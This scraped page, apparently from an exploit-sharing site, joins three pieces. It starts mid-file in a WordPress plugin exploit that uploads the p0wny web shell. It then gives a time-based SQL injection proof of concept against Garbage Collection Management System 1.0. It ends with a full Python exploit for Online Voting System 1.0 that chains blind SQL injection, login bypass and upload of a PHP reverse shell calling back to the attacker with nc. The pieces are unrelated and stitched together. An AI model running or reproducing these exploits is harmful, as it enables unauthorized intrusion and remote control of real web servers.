</style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------29650037893637916779865254589\r\nContent-Disposition: form-data; name=\"mec-ix-action\"\r\n\r\nimport-start-bookings\r\n-----------------------------29650037893637916779865254589--\r\n" # Exploit session.post(exploit_url, headers=header, data=body) print('') print('[+] Shell Uploaded to: ' + 'http://' + target_ip + ':' + target_port + wp_path + '/wp-content/uploads/shell.php') print('')
HireHackking
# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated) # Exploit Author: ircashem # Date 02.07.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 #################### # Proof of Concept # #################### POST /login.php HTTP/1.1 Content-Length: 456 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------238993435340593308934076060075 Origin: http://localhost DNT: 1 Referer: http://localhost/ Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Connection: close -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="username" admin -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="password" admin' AND (SELECT 1 from (select sleep(5))a) -- - -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="submit" -----------------------------238993435340593308934076060075-- ########### # Payload # ########### username=admin password=admin' AND (SELECT 1 from (select sleep(5))a) -- -
HireHackking
# Exploit Title: Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE) # Exploit Author: Geiseric # Original Exploit Author: deathflash1411 - https://www.exploit-db.com/exploits/50076 - https://www.exploit-db.com/exploits/50075 # Date 02.07.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 import requests import os import sys from requests_toolbelt.multipart.encoder import MultipartEncoder import string import random if len(sys.argv) < 4: print('[+] Usage: python3 ovsploit.py http://<ip> <your ip> <your port>') exit() url = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] exp_url = '/Online_voting_system/admin/save_candidate.php' login_url = '/Online_voting_system/admin/' def first_get(): r = requests.get(url+login_url) return r.headers['Set-Cookie'] def retrieve_first_admin(): print("[!] Stage 1: Finding a valid admin user through SQL Injection") cookie = first_get() count = 0 i=1 flag = True admin = '' while flag: for j in range(32,128): r = requests.post(url+login_url,data={'UserName': """aasd' AND (SELECT 7303 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(UserName AS NCHAR),0x20) FROM users WHERE User_Type = "admin" LIMIT 0,1),"""+str(i)+""",1))="""+str(j)+""",0,1)))))PwbW)-- qRBs""",'Password': 'asd','Login':''},headers={"Cookie":cookie}) if (r.elapsed.total_seconds() > 1): admin += chr(j) i+=1 sys.stdout.write("\rAdmin User: "+ admin) sys.stdout.flush() count=0 else: if count == 100: flag = False break else: count += 1 print("\n[+] First admin user found!") print("[!] Starting Stage 2") return admin def id_generator(size=6, chars=string.ascii_lowercase): return ''.join(random.choice(chars) for _ in range(size))+'.php' def login_bypass(cookie): username = retrieve_first_admin() print("[!] Stage 2 started: Bypassing Login...") r = requests.post(url+login_url,data={'UserName': username,'Password': "' or ''='",'Login':''}, headers={'Cookie':cookie}) return cookie def rev_write(): name = id_generator() f = open(name,'w') f.write('<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ' +attacker_ip+ " " + attacker_port+' >/tmp/f"); ?>') f.close() print('[+] Generated file with reverse shell: ' +name) return name def exploit(cookie): print("[+] Uploading reverse shell...") filename=rev_write() multipart_data = MultipartEncoder( { # a file upload field 'image': (filename, open(filename, 'rb'), 'application/x-php'), # plain text fields 'user_name': 'admin', 'rfirstname': 'test', 'rlastname': 'test', 'rgender': 'Male', 'ryear': '1st year', 'rmname': 'test', 'rposition': 'Governor', 'party': 'test', 'save': 'save' } ) r = requests.post(url+exp_url, data=multipart_data, headers={'Content-Type': multipart_data.content_type, 'Cookie':cookie}) return filename filename = exploit(login_bypass(first_get())) print("[!] Triggering...") input('[+] Please start a listener on port ' + attacker_port +' then press Enter to get shell.') os.system('curl '+url+'/Online_voting_system/admin/upload/'+filename+' -m 1 -s') print("[+] Cleaning up!") os.system("rm "+ filename)